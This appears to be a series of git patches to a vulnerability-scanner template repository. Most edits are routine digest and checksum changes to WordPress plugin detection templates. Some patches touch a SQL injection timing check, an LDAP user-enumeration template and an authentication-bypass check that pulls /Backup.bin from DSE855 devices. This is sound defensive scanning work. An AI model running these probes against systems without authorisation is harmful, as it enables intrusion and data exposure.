b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 59e139eb08..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210091ac599d6702f2efd8e1e4fd4d4359cf8e80f6c48997ce9e2f9d0f67af0c9bf9022100bd3818bd2379865d1b7a16a92e4ca1e3ef9f857e32d93ce790e7f3535ae0c38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 6f8a1dec19..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ea9135bf615cbbbedc53bc34024b5455f7f9bc6ff4e99f6cf89b1a776a283aa02202c90bde177e48c15c2b157810f2605d13c340a53e6c0537a474409e1979be09c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 39c1d31a08..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016ce18a1a12d46ef0a48389245764f15daa3723491673b9609044d96f1e94a7a022100e48815bc4e9e8a8a844b0d0ee7746240c8d2c4008d138021864b88f703356f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 6c3a68c37b..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e10dca494ac96ff524128df3fb8742f171c7ca9df000b611313bbb1cae71a0fe02205380ef938c355bb35b80789b09cbc705558eee4d43d269508a8d6ba0c9f524fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 80928bb47b..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b1b9c1f0b311d151901f242bab8674e44f3814466b2f487a7ebb44596cf4bc2022100a7222351d453bbd33e0d71a3dba4db1c109a6b0a477feb44b6b294a65647d38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 18a6327308..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201bcfe0b014b20bbc525b65cb62d45cabdd2688d240b83d1b41865f0931ed229d02203094f6449118cae42ae5ec16b856c45f7c5300b3d8e47a4b7fd83e61a2c6e098:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 3898774ebe..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082a925edc88bd214177afe59b0557b18e7b04855df0eb24e3b851c2dbc9e361e02203cc96a7f1179fcb04e4d51ad8b290e8aabf3538b55fbe9478467c2cc8f12d987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index a6bbf38542..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008fed0292baefa9b603c88983f2613e945908a565f756914e5aa4960fb131efc102204bd6734ab937261a6f4a481e36e8a0b1840bc01019df7132ac7b9496dd4dfbd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 479c4db135..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8cc89b8c0121b66f21690d2281cd1fec2cb14c7dc6c8e34641be0871f2e32e90220240f6edfe89a2834474f34b17c41dfbb796c80ffd0e943241e172892100a064d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index b0b84c82b8..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0fb451bf826a4c32656ef610562ba8a0ffe77bd491b3d4f832feeda9de532c002200828be76037169b53b79368e4ea62420aec283980d0063f65a4fdac961bc1b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 78aae84166..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af3f0a3f9551d81e6934fb0d8a5fc727d087d9ba242b0de9df90269be8d12f6902205f76b64a33c6a51e1f29e4d5b43fead1d78effdf547dca791d15f3b0e4ad24a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 73333ed0e1..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c167c26edf964fe4ef59a96285b4e7128135c0401d4484dd8788ed052bda70bf022051a44b1ee69fe5056a17c26d149ea4abadb6490421da9556ae2066b6058edbf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 80d43ef8e3..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4b5ab6e095fd132c4b1251d90fc33cdfc9f31f5a58009182e2c024f3930f0530221009e66b90a931007a2fe77d5b516aa73adb031ce2f555560121ddfc754d67813fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ee56a1641f48822196aca98f7d2e09a42c754c45 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 11:42:26 +0530 Subject: [PATCH 0843/1841] Update ldap-get-ad-users.yaml --- javascript/enumeration/ldap/ldap-get-ad-users.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/enumeration/ldap/ldap-get-ad-users.yaml b/javascript/enumeration/ldap/ldap-get-ad-users.yaml index 24fd3e0f86..14d2120d90 100644 --- a/javascript/enumeration/ldap/ldap-get-ad-users.yaml +++ b/javascript/enumeration/ldap/ldap-get-ad-users.yaml @@ -6,7 +6,7 @@ info: description: | Retrieve users from Active Directory, where each user is represented by an ADObject. reference: - - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.ADObject + - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.ADObject metadata: max-request: 1 shodan-query: ldap @@ -43,4 +43,4 @@ javascript: extractors: - type: dsl dsl: - - response \ No newline at end of file + - response From c6ad0cd05e9bb99071a6beafb883cc2742491527 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 12:44:02 +0530 Subject: [PATCH 0844/1841] minor-update --- http/vulnerabilities/other/azon-dominator-sqli.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/azon-dominator-sqli.yaml b/http/vulnerabilities/other/azon-dominator-sqli.yaml index 762a57bb0d..64713b5bae 100644 --- a/http/vulnerabilities/other/azon-dominator-sqli.yaml +++ b/http/vulnerabilities/other/azon-dominator-sqli.yaml @@ -4,7 +4,8 @@ info: name: Azon Dominator - SQL Injection author: securityforeveryone severity: high - description: Azon Dominator software is vulnerable to a sql attack at /fetch_products.php. + description: | + Azon Dominator software is vulnerable to a sql attack at /fetch_products.php. reference: - https://www.exploit-db.com/exploits/52059 - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script @@ -17,7 +18,7 @@ info: http: - raw: - | - @timeout 20sn + @timeout 20s POST /fetch_products.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -27,7 +28,7 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body,"id","name")' + - 'contains_all(body,"id","name","save_lists.php")' - 'duration>=6' - 'status_code==500' condition: and From 5f1013fc5037e72d478b216679df40719134031b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 13:07:32 +0530 Subject: [PATCH 0845/1841] minor-update --- http/cves/2024/CVE-2024-5947.yaml | 25 +++++++++++++++++-------- 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-5947.yaml b/http/cves/2024/CVE-2024-5947.yaml index f56b306885..d80e8e940f 100644 --- a/http/cves/2024/CVE-2024-5947.yaml +++ b/http/cves/2024/CVE-2024-5947.yaml @@ -1,7 +1,7 @@ id: CVE-2024-5947 info: - name: Deep Sea Electronics DSE855 Remote Authentication Bypass + name: Deep Sea Electronics DSE855 - Authentication Bypass author: securityforeveryone severity: medium description: | @@ -13,17 +13,28 @@ info: metadata: verified: "true" max-request: 1 - fofa-query: "Deep Sea Electronics" vendor: Deep Sea Electronics product: DSE855 - tags: cve,cve2024,bypass,info-leak + fofa-query: "Deep Sea Electronics" + tags: packetstorm,cve,cve2024,bypass,info-leak + +flow: http(1) && http(2) http: - raw: - | - GET HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - 'contains(body,"Copyright Deep Sea Electronics")' + - 'status_code == 200' + condition: and + internal: true + + - raw: - | GET /Backup.bin HTTP/1.1 Host: {{Hostname}} @@ -31,8 +42,6 @@ http: matchers: - type: dsl dsl: - - 'contains(body_1,"Copyright Deep Sea Electronics")' - - 'status_code_1 == 200' - - 'contains(content_type_2,"Unknown")' - - 'status_code_2 == 200' + - 'contains(content_type,"Unknown")' + - 'status_code == 200' condition: and From ccab74e6b1d3d9b5f2d3c1964d107d3b3bd07931 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 13:09:40 +0530 Subject: [PATCH 0846/1841] Rename dast/vulnerabilities/xinclude-injection.yaml to dast/vulnerabilities/injection/xinclude-injection.yaml --- dast/vulnerabilities/{ => injection}/xinclude-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename dast/vulnerabilities/{ => injection}/xinclude-injection.yaml (99%) diff --git a/dast/vulnerabilities/xinclude-injection.yaml b/dast/vulnerabilities/injection/xinclude-injection.yaml similarity index 99% rename from dast/vulnerabilities/xinclude-injection.yaml rename to dast/vulnerabilities/injection/xinclude-injection.yaml index 40a1570071..27e563fc0a 100644 --- a/dast/vulnerabilities/xinclude-injection.yaml +++ b/dast/vulnerabilities/injection/xinclude-injection.yaml @@ -42,4 +42,4 @@ http: part: body words: - 'for 16-bit app support' -# digest: 4a0a00473045022100b25c0306168fca549236f8877534a9ddbe228206ed95ba92039127e97f89c1d002207fb795beea65540ff515e458f9ccffe699c4293e15a188b9391acce754242356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b25c0306168fca549236f8877534a9ddbe228206ed95ba92039127e97f89c1d002207fb795beea65540ff515e458f9ccffe699c4293e15a188b9391acce754242356:922c64590222798bb761d5b6d8e72950 From fa6a45e4936b1ef921b22a119efe010554cf9004 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 13:10:55 +0530 Subject: [PATCH 0847/1841] space fix --- file/keys/amazon/aws-cognito.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index 80ab71d209..dda00456de 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -2,7 +2,7 @@ id: aws-cognito-pool info: name: Amazon Web Services Cognito Pool ID - Detect - author: gaurang, zeroc00i + author: gaurang,zeroc00i severity: info description: Amazon Web Services Cognito Pool ID token was detected. classification: From 4c42483c40863faee192dbf47279d5ec64244220 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 13:11:50 +0530 Subject: [PATCH 0848/1841] Rename dast/vulnerabilities/csv-injection.yaml to dast/vulnerabilities/injection/csv-injection.yaml --- dast/vulnerabilities/{ => injection}/csv-injection.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename dast/vulnerabilities/{ => injection}/csv-injection.yaml (100%) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/injection/csv-injection.yaml similarity index 100% rename from dast/vulnerabilities/csv-injection.yaml rename to dast/vulnerabilities/injection/csv-injection.yaml From 95540df8cf31e79b64e6e3b6e733f6f02fd07335 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 07:45:23 +0000 Subject: [PATCH 0849/1841] Auto Generated New Template Addition List [Thu Jul 4 07:45:23 UTC 2024] :robot: --- .new-additions | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index 49292bf449..cdaa191333 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ -dast/vulnerabilities/xinclude-injection.yaml +dast/vulnerabilities/injection/csv-injection.yaml +dast/vulnerabilities/injection/xinclude-injection.yaml http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml From d2d8bf2acccb363f4c96b775061a1af500076ab6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 07:45:29 +0000 Subject: [PATCH 0850/1841] Auto Generated Templates Checksum [Thu Jul 4 07:45:29 UTC 2024] :robot: --- templates-checksum.txt | 420 ++++++++++++++++++++--------------------- 1 file changed, 210 insertions(+), 210 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 271f6114ce..11acdc2675 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -234,6 +234,7 @@ dast/vulnerabilities/cmdi/ruby-open-rce.yaml:89c6935b600f5037198944b00841ae4e650 dast/vulnerabilities/crlf/cookie-injection.yaml:47b5859ec897917dcc633dee9d83454b203d2ab8 dast/vulnerabilities/crlf/crlf-injection.yaml:b2a16bd3436b9429d72d4f929ab55ad5ee880a91 dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28f4ec95a4d09add80ffff07e7a8f71d +dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9f452e835936f370 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d30c25c13 @@ -244,7 +245,6 @@ dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a4 dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 -dast/vulnerabilities/xinclude-injection.yaml:ae3c55714404e98d88a1ce452e9ca890e92b9c98 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a @@ -807,7 +807,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:f0500ea689c78156fdded5bae2 helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:46b9aa433f3d21deebfa357ca15abf4190ceea0e +helpers/wordpress/plugins/gutenberg.txt:7aa4f5f6af6e8c542120b221a810ac023bd89d3b helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -850,7 +850,7 @@ helpers/wordpress/plugins/newsletter.txt:806b01f722148eb1b6ddf37464ad8f18232e642 helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 helpers/wordpress/plugins/ninja-forms.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce -helpers/wordpress/plugins/ocean-extra.txt:18e9f01467bf3568b107a667570d1dd8c6440565 +helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/optinmonster.txt:ec386c8e47325b0d9e9d9c49e9bb46a21fcafbf1 @@ -899,11 +899,11 @@ helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d helpers/wordpress/plugins/the-events-calendar.txt:44dbfaa714938949bc31889d586fe82bf4c0cd84 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 -helpers/wordpress/plugins/translatepress-multilingual.txt:0aaa3cea7451675ff270540e13308210d8fce9ab +helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:efeb47fd41d5443772275287ca2523cab8bc0139 helpers/wordpress/plugins/under-construction-page.txt:17bb8bf9f231900aaec8e0d2788c3fa060ef1c5c helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d -helpers/wordpress/plugins/updraftplus.txt:e8615588a2454d2d3d48934cdf103f3177c30c37 +helpers/wordpress/plugins/updraftplus.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 @@ -911,7 +911,7 @@ helpers/wordpress/plugins/w3-total-cache.txt:c3c414dd549c09cb265d8cf95aef8445bf8 helpers/wordpress/plugins/webp-converter-for-media.txt:404069cef132c1712e21fc32e891e96cf01bca92 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c -helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:2f748680a25a036bf7bc9ea657a46c211c9151dc +helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 @@ -934,7 +934,7 @@ helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43 helpers/wordpress/plugins/wp-maintenance-mode.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd -helpers/wordpress/plugins/wp-optimize.txt:42aae5955584904bc2d13eabc3cf07107b276398 +helpers/wordpress/plugins/wp-optimize.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d8c3854ca34a77499c02ddb33eac42b322bb70cb @@ -947,7 +947,7 @@ helpers/wordpress/plugins/wp-super-cache.txt:f84939ff21a1ffe63d6f3e405737228a6e1 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a -helpers/wordpress/plugins/wpforms-lite.txt:65b63da7547962e59c98dcf1e2db069084362d55 +helpers/wordpress/plugins/wpforms-lite.txt:5c03b265ddd394e2c86d928b3879d8d0b526cbaf helpers/wordpress/plugins/wps-hide-login.txt:51a2a1f09e1587e93a965d8ae52c2309477eba45 helpers/wordpress/plugins/wpvivid-backuprestore.txt:42932d0fb47c40d001ff73872d5fff049a1361b5 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 @@ -5711,7 +5711,7 @@ http/misconfiguration/installer/snipe-it-installer.yaml:582748ffd95ef18e4a27db00 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f -http/misconfiguration/installer/subrion-installer.yaml:4306ed85c5fb6ddf8f356de7ce680479b026eb55 +http/misconfiguration/installer/subrion-installer.yaml:a8f2b81746dd543682210b1cace11b0749aea1d2 http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcfaa5fa60f3a40ca http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc @@ -7240,228 +7240,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:5eb874b61c4ed2fa9ebafd85796eb286d71292b5 -http/technologies/wordpress/plugins/add-to-any.yaml:852e47b8eebe5ae7614628c3eac3bfcb8d865d4d -http/technologies/wordpress/plugins/admin-menu-editor.yaml:a148525c3ff0ea1d9510dffcb5dd25857bd22771 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:bfc2dc1405c48b9b7ea57612a52bf3fd3c69c0b7 -http/technologies/wordpress/plugins/akismet.yaml:4a3487a67472d564be5f7531e1e84c4d1e2c88dc +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:3637d13dd493a507f5dd5f256cb6691a1d048137 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:1eecb64ba63d9b703dfc8edf26ae7064cdb96122 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:7bb3cf358c4a65e84a699ab16260cd7a2c0242f8 -http/technologies/wordpress/plugins/amp.yaml:90ae87260a7a3839c35b5f64f5b40f1b86773b03 -http/technologies/wordpress/plugins/antispam-bee.yaml:28e201503e631f3f9876b9808261104adeede9aa -http/technologies/wordpress/plugins/astra-sites.yaml:c1cf088b1b6d4944c52b19f78493f1a680860211 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:18d50c381fa532bafac34833a4cf4e485a2a2cef -http/technologies/wordpress/plugins/backwpup.yaml:840a30f5fed6eeb1bf3323ba062105482756fbae -http/technologies/wordpress/plugins/better-search-replace.yaml:629f806e274deed1863e1057194c659df801c927 -http/technologies/wordpress/plugins/better-wp-security.yaml:5c8adf0cd0de7e8aad5768d105a57c224ffd2050 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:ff60e8d0b7099bf56d70fe385776f0228bf303a4 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:5f6b5a465f4de9218fd0c4ea06413400e0e5d590 -http/technologies/wordpress/plugins/breeze.yaml:5a4c20f29292e03babfcb679da958490f4d3c28d -http/technologies/wordpress/plugins/broken-link-checker.yaml:a1c198ebafb0406ffc05fc508fddf09a3d89edc6 -http/technologies/wordpress/plugins/chaty.yaml:b6e4953d5711c2ab1b438e1d5c5e2702f9d6d881 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:fc360b0d349c29a93d537ac94ca5edaafe462d91 -http/technologies/wordpress/plugins/classic-editor.yaml:82db8b1d705cfa28c02fb84c5c514b6b43829043 